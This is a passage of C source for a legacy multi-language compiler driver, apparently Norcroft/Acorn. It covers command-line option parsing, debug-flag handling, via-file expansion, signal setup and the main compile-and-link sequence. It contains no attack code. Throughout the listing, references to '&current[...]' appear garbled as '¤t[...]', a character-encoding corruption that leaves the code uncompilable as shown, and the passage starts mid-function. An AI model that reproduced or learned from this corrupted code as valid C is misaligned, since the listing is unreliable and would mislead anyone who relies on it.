sprintf(b, "-D%.*s", l, s);
tooledit_insertwithjoin(t, b, '=', equalp);
}
}
static void debug_set(char const *opts) {
int opt;
for (; (opt = *opts) != 0; ++opts) {
uint32 debugmask = 0;
switch (safe_toupper(opt))
{
#ifdef ENABLE_AETREE
case 'A': ++aetree_debugcount;
debugmask = DEBUG_AETREE; break;
#endif
case 'B': debugmask = DEBUG_BIND; break;
#ifdef ENABLE_CSE
case 'C': ++cse_debugcount;
debugmask = DEBUG_CSE; break;
#endif
case 'D': debugmask = DEBUG_DATA; break;
case 'E': debugmask = DEBUG_TEMPLATE; break;
case 'F': debugmask = DEBUG_FNAMES; break;
case 'G': debugmask = DEBUG_CG; break;
case 'H': debugmask = DEBUG_SPILL; break;
case 'I': ++files_debugcount;
debugmask = DEBUG_FILES; break;
case 'J': debugmask = DEBUG_SR; break;
#ifdef ENABLE_LOCALCG
case 'K': ++localcg_debugcount;
debugmask = DEBUG_LOCALCG; break;
#endif
case 'L': debugmask = DEBUG_LEX; break;
case 'M': debugmask = DEBUG_MAPSTORE; break;
case 'O': debugmask = DEBUG_OBJ; break;
case 'P': debugmask = DEBUG_PP; break;
case 'Q': debugmask = DEBUG_Q; break;
case 'R': debugmask = DEBUG_REGS; break;
case 'S': debugmask = DEBUG_SYN; break;
case 'T': debugmask = DEBUG_TYPE; break;
case 'U': debugmask = DEBUG_STORE; break;
case 'W': debugmask = DEBUG_2STORE; break;
case 'X': debugmask = DEBUG_X; break;
case 'Y': debugmask = DEBUG_LOOP; break;
case 'Z': ++syserr_behaviour;
#ifndef COMPILING_ON_MSDOS
#ifdef __CC_NORCROFT
(void) signal(SIGINT, SIG_DFL); /* permit NorCroft backtrace */
#endif
#endif
break;
default: cc_warn(warn_option_zq, opt);
}
sysdebugmask |= debugmask;
}
}
static void AddDebugFlags(char *s, uint32 tflags, char const *fl) {
char const *p;
for (p = fl; *p != 0; p++)
if (!(tflags & (1L << (*p - 'a'))))
*s++ = *p;
*s++ = '+';
for (p = fl; *p != 0; p++)
if (tflags & (1L << (*p - 'a')))
*s++ = *p;
*s = 0;
}
static int ogflags;
#define OG_O 1
#define OG_G 2
#define OG_GX 4
static bool HandleArg(ToolEnv *t, char const *current, char const *nextarg, bool ignoreerrors) {
int32 flags = driver_flags;
int uc_opt = safe_toupper(current[1]);
bool usednext = NO;
char b[512];
switch(uc_opt)
{
#ifdef FORTRAN
case 'F': if (current[1] == 'f') break;
/* @@@ LDS 10Aug89 - DO NOT CATCH 'O' HERE - IT BREAKS Unix Makefiles */
case 'M': if (current[1] == 'M') break;
case 'U':
case 'V':
#else
#ifndef DISABLE_ERRORS
case 'E': if (current[2] == 'S' && current[3] == 0) break;
#endif
#ifndef PASCAL /*ECN*/
case 'R':
#endif
#endif
case 'C':
case 'S': if (current[2] == 0) break;
if (!ignoreerrors) bad_option(current);
}
switch(uc_opt)
{
#ifdef FORTRAN
case '1': flags |= KEY_ONETRIP;
break;
case 'C': if (current[1] == 'c') flags &= ~KEY_LINK;
else pragmax_flags |= OPT_CHECKSUB;
break;
case 'I': if ((current[1] == 'i') && (current[2] == '2'))
pragmax_flags |= OPT_DEFHINTEGER;
else goto may_take_next_arg;
break;
case 'N': break;
case 'O': if (current[1] == 'o') goto may_take_next_arg;
if (current[2] != 0) /* -O has no effect currently */
{
int n = (current[2] - '0');
if ((current[3] != 0) || (n < 0) || (n > MINO_MAX)) {
if (!ignoreerrors) bad_option(current);
} else
{
new_cc_arg((n & MINO_CSE) ? "-ZPZ1" : "-ZPZ0");
if (n & MINO_NAO) pragmax_flags |= OPT_NOARGALIAS;
else pragmax_flags &= ~OPT_NOARGALIAS;
}
}
break;
case 'R': if (current[1] == 'R') nimp_option(current);
else {
if (current[2] == '8')
pragmax_flags |= OPT_DEFDOUBLE;
else {
new_cc_arg("-R");
if (Compiling_On_Unix) flags |= KEY_READONLY;
}
} break;
case 'U': if (current[1] == 'U') pragmax_flags &= ~EXT_CASEFOLD;
else pragmax_flags |= OPT_IMPUNDEFINED;
break;
case 'V': if (current[1] == 'v') {
new_cc_arg("-FB");
if (!ignoreerrors) cc_msg_lookup(driver_banner);
}
else goto link_command;
break;
#else /* FORTRAN */
case 'C': if (current[1] == 'c')
flags &= ~KEY_LINK;
else
tooledit_insert(t, "-C", "?");
break;
case 'I':
case 'J': goto may_take_next_arg;
case 'O': if (current[1] == 'o') goto may_take_next_arg;
ogflags |= OG_O;
if (current[2] != 0) {
if (cistreq(¤t[2], "time"))
tooledit_insert(t, "-O", "=time");
else if (cistreq(¤t[2], "space"))
tooledit_insert(t, "-O", "=space");
else if (!ignoreerrors)
bad_option(current);
}
break;
#endif /* FORTRAN */
case '\0': flags |= KEY_STDIN; /* '-' on its own denotes stdin... */
break;
case 'E': FortranUnimplementedOption('E', current);
#ifdef DISABLE_ERRORS
/* provide support for -Exyz to suppress certain errors. */
if (current[2] != 0) {
EnvFlagSet(t, ¤t[2], 'E', "acfilmpvz", ignoreerrors);
break;
}
#endif
if (Compiling_On_Unix && current[1] == 'e')
goto may_take_next_arg; /* X/Open -e epsym to ld */
#ifdef COMPILING_ON_MVS
if (current[2])
{ if (!ignoreerrors) cc_warn(warn_option_E, current);
break;
}
#endif
tooledit_insert(t, ".pp_only", "?");
flags &= ~KEY_LINK;
break;
case 'F': FortranUnimplementedOption('F', current);
EnvFlagSet(t, ¤t[2], 'f', "abcdefhijklmnopqrstuvwxyz", ignoreerrors);
break;
case 'G': ogflags |= OG_G;
if (current[2] == 0) {
tooledit_insert(t, "-g", "=+");
tooledit_insert(t, "-gt", "=+flvp");
tooledit_insert(t, "-gx", "?");
} else if (current[2] == 'x') {
ogflags |= OG_GX;
tooledit_insertwithjoin(t, "-gx", '=', ¤t[3]);
/* just option setting; no -g implication */
break;
} else if (current[2] == 't') {
tooledit_insertwithjoin(t, "-gt", '=', ¤t[3]);
/* just option setting; no -g implication */
break;
} else if (current[2] == '-') {
tooledit_insert(t, "-g", "=-");
break;
} else if (current[2] == '+') {
tooledit_insert(t, "-g", "=+");
break;
} else {
/* old fashioned -g with flags option */
char const *p = ¤t[2];
int ch;
uint32 tflags = 0, optflags = 0;
while ((ch = *p++) != 0)
switch (ch) {
case 'f': case 'l': case 'v': case 'p':
tflags |= (1L << (ch - 'a')); break;
case 'c': case 'r': case 'g': case 'o':
optflags |= (1L << (ch - 'a')); break;
}
if (tflags == 0)
tooledit_insert(t, "-gt", "=+flvp");
else {
char s[6];
AddDebugFlags(s, tflags, "flpv");
tooledit_insertwithjoin(t, "-gt", '=', s);
}
if (optflags == 0)
tooledit_insert(t, "-gx", "?");
else {
char s[5]; int i = 0;
for (ch = 'a'; ch <= 'z'; ch++)
if (optflags & (1L << (ch - 'a')))
s[i++] = ch;
s[i] = 0;
ogflags |= OG_GX;
tooledit_insertwithjoin(t, "-gx", '=', s);
}
tooledit_insert(t, "-g", "=+");
}
if (Compiling_On_Unix)
AddInclude(t, "-L.", "g");
else {
flags |= KEY_DEBUG;
AddArg(&ld_arg, "-d");
}
break;
case 'L': if (Compiling_On_Unix)
{ if (current[1] == 'l')
AddInclude(t, "-L.", ¤t[2]);
else
AddArg(&ld_arg, current);
}
else goto may_take_next_arg;
break;
case 'M': FortranUnimplementedOption('m', current);
if (Compiling_On_Unix && current[1] == 'm') /* request link map */
AddArg(&ld_arg, current);
else
switch(safe_toupper(current[2]))
{
case 'X': if (current[3] != 0) goto defolt;
tooledit_insert(t, "-M", "=<");
flags &= ~KEY_LINK;
break;
case '\0': tooledit_insert(t, "-M", "?");
flags &= ~KEY_LINK;
break;
case 'D': if (current[3] == '\0' ||
current[3] == '-' && current[4] == 0)
{ tooledit_insert(t, "-M", "=D");
if (current [3] == 0) flags |= KEY_MD;
break;
}
default:
defolt: if (!ignoreerrors) bad_option(current);
}
break;
case 'P': uc_opt = safe_toupper(current[2]);
switch(uc_opt)
{
case '\0': flags |= KEY_PROFILE;
break;
case 'G':
case 'X': if (current[3] == '\0')
{ flags |= KEY_XPROFILE;
break;
}
default: if (!ignoreerrors) bad_option(current);
return usednext;
}
if (current[2] == 0)
tooledit_insert(t, "-p", "?");
else
tooledit_insertwithjoin(t, "-p", '=', ¤t[2]);
if (setupenv.profile_lib[0] != '\0')
setupenv.default_lib = setupenv.profile_lib;
if (setupenv.fort_profile_lib[0] != '\0')
setupenv.fort_lib = setupenv.fort_profile_lib;
break;
#ifndef FORTRAN
case 'R':
if (Compiling_On_Unix && current[1] == 'r')
AddArg(&ld_arg, "-r"); /* X/Open compliance */
else {
#ifdef PASCAL /*ECN*/
EnvFlagSet(t, ¤t[2], 'r', "acdnpr", ignoreerrors);
#else
tooledit_insert(t, ".rolits", "=-f+w");
#endif
if (Compiling_On_Unix) flags |= KEY_READONLY;
}
break;
#endif
case 'S':
if (Compiling_On_Unix && current[1] == 's')
AddArg(&ld_arg, "-s");
else {
flags = (flags & ~KEY_LINK) | KEY_ASM_OUT;
tooledit_insert(t, ".asm_out","?");
}
break;
case 'W': if (current[2] == 0) {
EnvFlagSet(t, "adfgilnprv", 'W', "acdfgilmnoprstuvz", ignoreerrors);
tooledit_insert(t, ".nowarn", "=-W");
} else
EnvFlagSet(t, ¤t[2], 'W', "acdfgilmnoprstuvz", ignoreerrors);
break;
case 'Z': uc_opt = safe_toupper(current[2]);
switch(uc_opt)
{
case '\0': /* Pass on '-z' to the linker */
goto link_command;
case 'A': if (safe_toupper(current[3]) == 'P' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zap", '=', ¤t[4]) != TE_Failed)
break;
}
#ifdef MIN_ALIGNMENT_CONFIGURABLE
else if (safe_toupper(current[3]) == 'S' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zas", '=', ¤t[4]) != TE_Failed)
break;
} else if (safe_toupper(current[3]) == 'T' && isdigit(current[4])) {
if (tooledit_insertwithjoin(t, "-zat", '=', ¤t[4]) != TE_Failed)
break;
}
#endif
goto check_mcdep;
case 'C': tooledit_insert(t, ".schar", "=-zc");
break;
case 'I': if (isdigit(current[3]))
goto check_mcdep;
goto may_take_next_arg;
case 'Q': debug_set(¤t[3]); break;
case 'O': tooledit_insert(t, ".areaperfn", "=-zo");
break;
case '+': switch (safe_toupper(current[3])) {
case 'O': tooledit_insert(t, ".areaperfn", "=-z+o"); break;
case 'C': tooledit_insert(t, ".schar", "=-z+c"); break;
default: goto check_mcdep;
}
break;
#ifndef NO_DUMP_STATE
case 'G': switch (safe_toupper(current[3])) {
case 'W': tooledit_insertwithjoin(t, "-zgw", '=', ¤t[4]); break;
case 'R': tooledit_insertwithjoin(t, "-zgr", '=', ¤t[4]); break;
default: goto check_mcdep;
}
break;
#endif
case 'J': tooledit_insert(t, "-zj", "?");
break;
case 'P': if (isalpha(current[4])) {
bool negate;
PragmaSpelling const *p = keyword_pragma(¤t[3], &negate);
if (p != NULL) {
int32 val = p->value;
if (negate) {
#ifdef FORTRAN
if (pragchar == 'x' || pragchar == 'w')
val = ~val;
else
#endif
val = !val;
}
sprintf(b, "-zp%c", p->code);
sprintf(&b[8], "=%#lx", (long)val);
tooledit_insert(t, b, &b[8]);
}
} else {
sprintf(b, "-zp%c", current[3]);
tooledit_insertwithjoin(t, b, '=', ¤t[4]);
}
break;
case 'T': tooledit_insert(t, "-disallow_tentative_statics", "?");
break;
case 'Z': if (safe_toupper(current[3]) == 'T')
{
tooledit_insert(t, "-disallow_tentative_statics", "?");
current++;
}
tooledit_insertwithjoin(t, "-zz", '=', ¤t[3]);
break;
check_mcdep:
default: if (!mcdep_config_option(current[2], ¤t[3], t)) {
if (!ignoreerrors) cc_warn(warn_option, current);
}
break;
}
break;
link_command:
default:
#ifndef HOST_CANNOT_INVOKE_LINKER
AddArg(&ld_arg, current); break;
#else
if (!ignoreerrors) bad_option(current);
break;
#endif
#ifndef FORTRAN
case 'U':
#endif
case 'D':
may_take_next_arg:
uc_opt = safe_toupper(current[1]);
if (uc_opt == 'Z')
{ uc_opt = safe_toupper(current[2]);
if (uc_opt == 'I') uc_opt = 'S'; else uc_opt = 'Z';
}
if (current[2] == 0 || uc_opt == 'S' ||
current[3] == 0 && uc_opt == 'Z')
{ if (nextarg == NULL) {
if (!ignoreerrors) cc_msg_lookup(driver_option_missing_arg, current);
++cmd_error_count;
break;
}
usednext = YES;
}
else if (uc_opt == 'Z')
nextarg = ¤t[3];
else
nextarg = ¤t[2];
switch (uc_opt)
{
#ifdef COMPILING_ON_UNIX
case 'E': /* actually can only be "-e" here... X/Open */
#endif
case 'U':
if (Compiling_On_Unix && current[1] != uc_opt) /* e or u */
{ char *next = join_strs("-e ", nextarg);
next[1] = current[1];
AddArg(&ld_arg, next); /* X/Open */
break;
} /* 'U' falls through */
sprintf(b, "-D%s", nextarg);
tooledit_insert(t, b, "=");
break;
case 'D': AddDefine(t, nextarg);
break;
case 'I': AddInclude(t, "-I.", nextarg);
break;
case 'J': AddInclude(t, "-J.", nextarg);
break;
#ifndef HOST_CANNOT_INVOKE_LINKER
case 'L': AddInclude(t, "-L.", nextarg);
break;
#endif
case 'O': flags |= KEY_RENAME;
{ UnparsedName unparse;
fname_parse(nextarg, FNAME_SUFFIXES, &unparse);
setupenv.output_file = copy_unparse(&unparse, NULL);
}
break;
case 'S': /* -ZI<system> file */
tooledit_insertwithjoin(t, "-ZS", '=', ¤t[3]);
tooledit_insertwithjoin(t, "-ZI", '=', nextarg);
break;
case 'Z': tooledit_insertwithjoin(t, "-zz", '=', nextarg);
break;
}
}
driver_flags = flags;
return usednext;
}
/*
* Extract compilation options from the command line.
*/
typedef struct { char const *name; int32 key; char const *envname; char const *envval; } KW;
static KW const keytab[] = {
{"-help", KEY_HELP, NULL, NULL},
{"-h", KEY_HELP, NULL, NULL},
{"-verify", KEY_VERIFY, NULL, NULL},
{"-echo", 0, ".echo", "=-echo"},
{"-link", KEY_LINK, NULL, NULL},
{"-list", KEY_LISTING, NULL, NULL},
{"-errors", KEY_NEXT+KEY_ERRORSTREAM, NULL, NULL},
{"-via", KEY_NEXT+KEY_VIAFILE, NULL, NULL},
{"-config", KEY_CONFIG},
#ifdef TARGET_ENDIANNESS_CONFIGURABLE
{"-littleend", 0, ".bytesex", "=-li"},
{"-li", 0, ".bytesex", "=-li"},
{"-bigend", 0, ".bytesex", "=-bi"},
{"-bi", 0, ".bytesex", "=-bi"},
#endif
#if defined(PASCAL) /*ECN*/
{"-iso", 0, ".lang", "-iso"},
{"-arthur", KEY_HOST_LIB, NULL, NULL},
{"-super", KEY_HOST_LIB, NULL, NULL},
{"-counts", KEY_COUNTS+KEY_LISTING, NULL, NULL},
#elif defined(FORTRAN)
# ifndef TARGET_IS_UNIX
{"-bsd", KEY_PCC, NULL, NULL},
# endif
{"-onetrip", KEY_ONETRIP, NULL, NULL},
{"-fussy", KEY_STRICT, NULL, NULL},
{"-f66", KEY_F66, NULL, NULL},
{"-strict", KEY_STRICT, NULL, NULL},
{"-extend", KEY_LONGLINES, NULL, NULL},
#else /* not FORTRAN or PASCAL */
{"-ansi", 0, ".lang", "=-ansi"},
{"-ansic", 0, ".lang", "=-ansi"},
{"-pcc", 0, ".lang", "=-pcc"},
{"-fussy", 0, ".lang", "=-strict"},
{"-strict", 0, ".lang", "=-strict"},
{"-pedantic", 0, ".lang", "=-strict"},
#ifdef CPLUSPLUS
{"-cfront", 0, ".lang", "=-cfront"},
{"-cpp", 0, ".lang", "=-cpp"},
#endif
{"-arthur", KEY_HOST_LIB, NULL, NULL},
{"-super", KEY_HOST_LIB, NULL, NULL},
{"-counts", KEY_COUNTS+KEY_LISTING, NULL, NULL},
# ifdef FOR_ACORN
{"-throwback", KEY_THROWBACK, NULL, NULL},
{"-desktop", KEY_NEXT+KEY_DESKTOP, NULL, NULL},
{"-depend", KEY_NEXT+KEY_DEPEND, NULL, NULL},
{"-c++", KEY_CFRONTPREPROCESS, NULL, NULL},
# endif
# ifdef RISCiX113
{"-riscix1.2", KEY_RIX120, NULL, NULL},
# endif
#endif /* PASCAL */
};
static KW const *keyword(const char *string)
{
unsigned count;
for (count = 0; count < sizeof(keytab)/sizeof(keytab[0]); ++count)
if (cistreq(string, keytab[count].name))
return &keytab[count];
return NULL;
}
typedef struct {
char const *s;
Uint i;
} ViaSRec;
static int vias_getc(void *arg) {
ViaSRec *p = (ViaSRec *)arg;
int ch = p->s[p->i];
if (ch == 0) return EOF;
p->i++;
return ch;
}
static int via_getc(void *arg) {
return fgetc((FILE *)arg);
}
static int mapvia(
void *v, int (*getcfn)(void *), char const *viafile, char **newargv)
{ int ch, newargc;
bool got_via = NO;
char word[128];
if (v == NULL)
{ cc_msg_lookup(driver_via_not_opened, viafile);
compiler_exit(1);
}
for (newargc = 0, ch = ' ';;)
{ unsigned p = 0;
while (ch != EOF && isspace(ch)) ch = getcfn(v);
if (ch == EOF) break;
if (ch == '"' || ch == '\'') {
int quote = ch;
for (;;) {
ch = getcfn(v);
if (ch == EOF || ch == quote) break;
if (p < (sizeof(word)-1)) word[p++] = ch;
}
} else
do
{ if (p < (sizeof(word)-1)) word[p++] = ch;
ch = getcfn(v);
} while (ch != EOF && !isspace(ch));
word[p] = 0;
if (got_via)
{ FILE *f = fopen(word, "r");
newargc += mapvia(f, via_getc, word, newargv==NULL ? NULL : newargv+newargc);
fclose(f);
got_via = NO;
}
else if (cistreq(word, "-via"))
got_via = YES;
else
{ if (newargv != NULL) {
size_t len = strlen(word)+1;
newargv[newargc] = (char *)memcpy(PermAlloc((int32)len), word, len);
}
++newargc;
}
}
return newargc;
}
static void read_options(
int count, int argc, char **argv, ToolEnv *t, bool ignoreerrors) {
for (; count < argc; ++count)
{ char const *arg = argv[count];
KW const *key = keyword(arg);
if (key == NULL)
{ KW_Status status = mcdep_keyword(arg, argv[count+1], t);
if (status == KW_OKNEXT) {
count++;
continue;
} else if (status == KW_OK) {
continue;
} else if (status != KW_NONE) {
if (!ignoreerrors) {
cc_msg_lookup(driver_option_bad1);
cc_msg("'%s", arg);
if (status == KW_BADNEXT)
cc_msg(" %s", argv[++count]);
cc_msg("'"); /* makes NLS string more sensible */
cc_msg_lookup(driver_option_bad2);
}
++cmd_error_count;
continue;
}
} else if (key->envname != NULL) {
char b[64];
char const *s = key->envval;
if (StrEq(key->envname, ".lang")) {
char const *val = toolenv_lookup(t, key->envname);
if (StrEq(key->envval, "=-strict")) {
if (strchr(val, ' ') == NULL) {
strcpy(b, val);
strcat(b, " -strict");
s = b;
}
} else if (StrEq(val, "=-strict")) {
strcpy(b, key->envval);
strcat(b, " -strict");
s = b;
}
}
tooledit_insert(t, key->envname, s);
continue;
} else {
if (key->key & KEY_NEXT) {
if (++count >= argc) {
if (ignoreerrors)
return;
else {
cc_msg_lookup(driver_option_missing_filearg, arg);
compiler_exit(1);
}
}
#ifdef FOR_ACORN
if (key->key & KEY_DEPEND) {
tooledit_insert(t, "-M", "=+");
tooledit_insertwithjoin(t, ".depend", '=', argv[count]);
}
else if (key->key & KEY_DESKTOP)
dde_desktop_prefix = argv[count];
else
#endif
if (key->key & KEY_ERRORSTREAM) {
if (!ignoreerrors) {
errors = fopen(argv[count], "w");
if (errors == NULL) {
cc_msg_lookup(driver_cant_open_output, argv[count]);
compiler_exit(1);
}
}
argv[count] = NULL;
} else if (key->key & KEY_VIAFILE) {
FILE *v = fopen(argv[count], "r");
int n = mapvia(v, via_getc, argv[count], NULL);
if (n < 0) {
if (ignoreerrors)
return;
else
compiler_exit(1);
}
if (n == 0)
++count;
else {
char **newargv = (char **)
PermAlloc(sizeof(char *) * ((int32)argc - count + n + 1));
int j;
fseek(v, 0L, SEEK_SET);
n = mapvia(v, via_getc, NULL, &newargv[1]);
for (j = count; ++j < argc;)
newargv[++n] = argv[j];
newargv[++n] = NULL;
count = 0;
argc = n;
argv = newargv;
}
fclose(v);
}
}
#if defined(FORTRAN) && !defined(TARGET_IS_UNIX)
else if (key->key == KEY_PCC)
pragmax_flags = RISCIX_FORTRAN_PRAGMAX;
#endif
#ifdef FOR_ACORN
else if (key->key & KEY_THROWBACK)
dde_throwback_flag = 1;
else if (key->key & KEY_CFRONTPREPROCESS)
cplusplus_flag = 1;
#endif
else if (key->key & KEY_COUNTS) {
tooledit_insert(t, "-K", "?");
driver_flags |= key->key;
} else
driver_flags |= key->key;
continue;
}
/* not a keyword argument */
if (arg[0] == '-') {
if (HandleArg(t, arg, argv[count+1], ignoreerrors))
count++;
} else {
AddArg(&cc_fil, arg);
}
}
if (ogflags & OG_O) {
tooledit_insert(t, "-zpz", "=1");
if (ogflags & OG_G && !(ogflags & OG_GX))
tooledit_insert(t, "-gx", "=o");
}
#ifdef PASCAL /*ECN*/
driver_flags |= KEY_ANSI;
#endif
}
void TE_DecodeArgumentLine(ToolEnv *t, char const *s, bool ignoreerrors) {
ViaSRec vr;
int n;
vr.i = 0; vr.s = s;
n = mapvia(&vr, vias_getc, NULL, NULL);
if (n < 0) compiler_exit(1);
if (n > 0) {
char **newargv = (char **)PermAlloc(sizeof(char *) * ((int32)n+1));
vr.i = 0;
n = mapvia(&vr, vias_getc, NULL, newargv);
newargv[n] = NULL;
read_options(0, n, newargv, t, ignoreerrors);
}
}
static void FinishedOptions(ToolEnv *t) {
#ifdef RISCiX113
if (!(driver_flags & KEY_RIX120))
tooledit_insert(t, "-D__type", "==___type");
#endif
if (FindLast(t, "-J.") == 0) {
/*
* No -J so add default system path to -I list
*/
#ifdef PASCAL
const char *path = setupenv.include_pas_path;
#else
const char *path = setupenv.include_pcc_path;
# ifdef RISCiX113
if (((flags & KEY_ANSI) || !(flags & (KEY_PCC))) &&
!(flags & KEY_RIX120))
path = setupenv.include_ansi_path;
# endif
#endif
AddInclude(t, "-I.", path);
}
/* If compiling on Unix and in Ansi mode add extra libraries. */
/*
* ACN: Oh misery - if I am compiling and linking under Unix, but to generate
* Helios binaries, I do not want to scan the extra libraries indicated
* here. I think the problem here is mostly because TARGET_IS_HELIOS
* improperly sets the KEY_UNIX bit in flags - but to invent a KEY_HELIOS
* would also be some work since elsewhere in this code there seems
* to be a dichotomy assumed between Unix and Risc-OS...
* AM: except for this file the alternative of MVS should be possible!
* Thus the conditional
* compilation here seems (in the short term) my easiest way out.
*/
#ifdef RISCiX113
if (((flags & KEY_ANSI) || !(flags & (KEY_PCC))) &&
!(flags & KEY_RIX120))
{
AddInclude(t, "-L.", "ansi");
AddInclude(t, "-L.", "m");
}
#endif
if (FindLast(t, "-L.") == 0 || Compiling_On_Unix)
AddInclude(t, "-L.", setupenv.default_lib);
}
/*
* Main.
*/
static void InitArgV(ArgV *p, int n) {
p->v = (char const **)PermAlloc(sizeof(char *) * n);
p->sz = n; p->n = 0;
}
static char *progname_copy;
char const *compiler_name(void) { return progname_copy; }
static void *falloc(size_t n) { return PermAlloc(n); }
static int cc_main(int argc, char **argv, ToolEnv *t)
{
char *progname;
bool is_cpp = NO;
#if (defined(COMPILING_ON_UNIX) && defined(FORTRAN))
progname = "f77"; /* rather than the "f77comp" we would get from argv[0] */
#else
char p[32];
char *default_output = setupenv.output_file;
#endif
errors = NULL;
sysdebugmask = 0;
syserr_behaviour = 0;
aetree_debugcount = 0;
#ifdef ENABLE_CSE
cse_debugcount = 0;
#endif
localcg_debugcount = 0;
#ifdef TARGET_HAS_DEBUGGER
usrdbgmask = 0;
#endif
alloc_initialise();
trackfile_initialise(falloc);
errstate_initialise();
progname = program_name(argv[0], p, 32);
progname_copy = PermString(progname);
#ifdef TIME_LIMIT
if (time(0) > TIME_LIMIT) {
fprintf(stderr, "This time-limited software has expired.\nPlease contact "
VENDOR_NAME /* specified in options.h */
" for an up to date release.\n");
compiler_exit(99);
}
#endif
main_error_count = cmd_error_count = 0;
#ifdef CHECK_AUTHORIZED
check_authorized();
#endif
#ifdef NLS
msg_init(argv[0], MSG_TOOL_NAME);
#endif
#ifndef HOST_WANTS_NO_BANNER
cc_msg_lookup(driver_banner);
#endif
#ifndef COMPILING_ON_UNIX
#ifndef COMPILING_ON_MSDOS
(void) signal(SIGINT, compile_abort);
#else /* DOS, Windows, Win32 */
(void) signal(SIGTERM, compile_abort);
#endif
#else
# ifdef DRIVER_PRE_RELEASE_MSG
cc_msg_lookup(driver_prerelease);
# endif
#ifndef COMPILING_ON_MSDOS
/* The signal ignore state can be inherited from the parent... */
if (signal(SIGINT, SIG_IGN) != SIG_IGN)
(void) signal(SIGINT, compile_abort);
#ifdef SIGHUP
if (signal(SIGHUP, SIG_IGN) != SIG_IGN)
(void) signal(SIGHUP, compile_abort);
#endif
if (signal(SIGTERM, SIG_IGN) != SIG_IGN)
(void) signal(SIGTERM, compile_abort);
#endif
#endif
get_external_environment();
driver_flags = setupenv.initial_flags;
#ifdef FORTRAN
pragmax_flags = setupenv.initial_pragmax;
#endif
if (argc == 1)
{ /* used with no argument */
give_help(progname);
compiler_exit(1);
}
{ UnparsedName un;
fname_parse(argv[0], ".exe .EXE" , &un);
if (un.rlen == 3 &&
(StrnEq(un.root, "cpp", 3) ||
StrnEq(un.root, "CPP", 3)))
{
/* The compiler was called as '...cpp' - treat as 'cc -E'. */
driver_flags = (driver_flags | KEY_PREPROCESS) & ~KEY_LINK;
tooledit_insert(t, ".pp_only", "?");
}
}
InitArgV(&cc_arg, argc);
InitArgV(&cc_fil, argc);
InitArgV(&ld_arg, argc);
InitArgV(&ld_fil, argc);
{ char const *etc = toolenv_lookup(t, ".etc");
if (etc != NULL) TE_DecodeArgumentLine(t, &etc[1], NO);
}
read_options(1, argc, argv, t, NO);
#ifdef FOR_ACORN
if (!(driver_flags & KEY_CFRONTPREPROCESS))
/* IDJ: 06-Jun-94: banner if not -c++ */
cc_msg_lookup(driver_banner);
#endif
validate_flags();
if (driver_flags & KEY_HELP)
{ give_help(progname);
compiler_exit(0);
}
if (driver_flags & KEY_CONFIG)
{ if (toolenv_putinstallationdelta(t) != 0)
{ cc_msg_lookup(driver_toolenv_writefail);
compiler_exit(EXIT_error);
}
compiler_exit(0);
}
FinishedOptions(t);
{ char const *echoval = toolenv_lookup(t, ".echo");
if (echoval != NULL && StrEq(echoval, "=-echo")) {
size_t atstart = 1;
char line[256];
char *dynline = NULL;
char *linep = line;
int len;
if (argv[0] != NULL) atstart += strlen(argv[0])+1;
len = tooledit_getcommandline(t, line+atstart, 254-atstart);
if (len > (int)(254-atstart)) {
dynline = (char *)malloc(len+2+atstart);
len = tooledit_getcommandline(t, dynline+atstart, len+2);
linep = dynline;
}
linep[0] = '[';
if (argv[0] != NULL) {
strcpy(linep+1, argv[0]);
linep[atstart-1] = ' ';
}
linep[len+atstart-1] = ']';
linep[len+atstart] = '\n';
linep[len+atstart+1] = 0;
cc_msg(linep);
if (dynline != NULL) free(dynline);
}
}
set_flag_options(t);
if (toolenv_lookup(t, ".pp_only") != NULL)
{ is_cpp = YES;
if (cc_fil.n >= 2)
{ if (cc_fil.n > 2)
cc_msg_lookup(driver_cpp_toomanyfileargs);
if (freopen(cc_fil.v[1], "w", stdout) == NULL)
{ cc_msg_lookup(driver_cpp_cantopenoutput, cc_fil.v[1]);
compiler_exit(EXIT_error);
}
cc_fil.n = 1;
}
}
if (cc_fil.n > 0)
{
if (driver_flags & KEY_STDIN)
cc_msg_lookup(driver_stdin_otherfiles);
process_file_names(t, &cc_fil);
}
else if (is_cpp || (driver_flags & KEY_STDIN))
{ char *output_file = setupenv.output_file == default_output ? NULL :
setupenv.output_file;
/* was: output_file = setupenv.output_file; but writes asm to a.out */
/* we need to separate the differing uses of "output_file". */
#ifdef DEFAULT_STDIN_OBJECT
if (!(driver_flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)) &&
setupenv.output_file == NULL)
output_file = DEFAULT_STDIN_OBJECT;
#endif
if (ccom(t, "-", output_file, NULL, NULL))
{ ++main_error_count;
if (output_file != NULL)
#ifdef COMPILING_ON_RISC_OS
/* The next line is dirty and should be done by checking return code, */
/* not peeking at other's variables. */
if (errorcount) /* only delete o/p file if serious errors */
#endif
remove(output_file);
}
}
else cc_msg_lookup(driver_noeffect, progname);
#ifndef HOST_CANNOT_INVOKE_LINKER
# ifdef LINKER_IS_SUBPROGRAM
/* IJR: hack to ensure that path gets passed to linker in argv[0] for NLS */
{ UnparsedName un;
size_t n;
char *new_name;
fname_parse(argv[0], "" , &un);
un.root = setupenv.link_cmd;
un.rlen = strlen(un.root);
n = un.vlen + un.plen + un.rlen + un.elen + 10;
new_name = (char *)PermAlloc(n);
if (fname_unparse(&un, FNAME_AS_NAME, new_name, n) < 0)
driver_abort("internal fault in \"copy_unparse\""); /* @@@ syserr? */
setupenv.link_cmd = new_name;
}
# endif
if (main_error_count == 0 && (driver_flags & KEY_LINK) && ld_fil.n > 0)
linker(t, driver_flags);
#endif
/*
* The SUN ignores the return value from main so exit() instead
*/
compiler_exit(main_error_count + cmd_error_count > 0 ? EXIT_error : 0);
return 0;
}
static int cc(int argc, ArgvType *argv, ToolEnv *t,
backchat_Messenger *sendmsg, void *backchathandle)
{ int status;
backchat.send = sendmsg;
backchat.handle = backchathandle;
status = setjmp(exitbuf);
if (status == 0)
status = cc_main(argc, argv, t);
else
status = compiler_exit_status;
return status;
}
char const *toolenv_toolname(void) {
return MSG_TOOL_NAME;
}
ToolEnv *cc_default_env;
static int cc_finalise(ToolEntryPoints const *te) {
IGNORE(te);
if (cc_default_env != NULL) toolenv_dispose(cc_default_env);
return 0;
}
static int MergeEnv(ToolEnv *t, ToolEnvDelta delta) {
int rc;
alloc_initialise();
rc = toolenv_merge(t, delta);
if (rc == 0) TE_NormaliseEtc(t);
alloc_finalise();
return rc;
}
static int CC_EditEnv(ToolEnv *t, HWND wh) {
int rc;
alloc_initialise();
rc = Tool_EditEnv(t, wh);
alloc_finalise();
return rc;
}
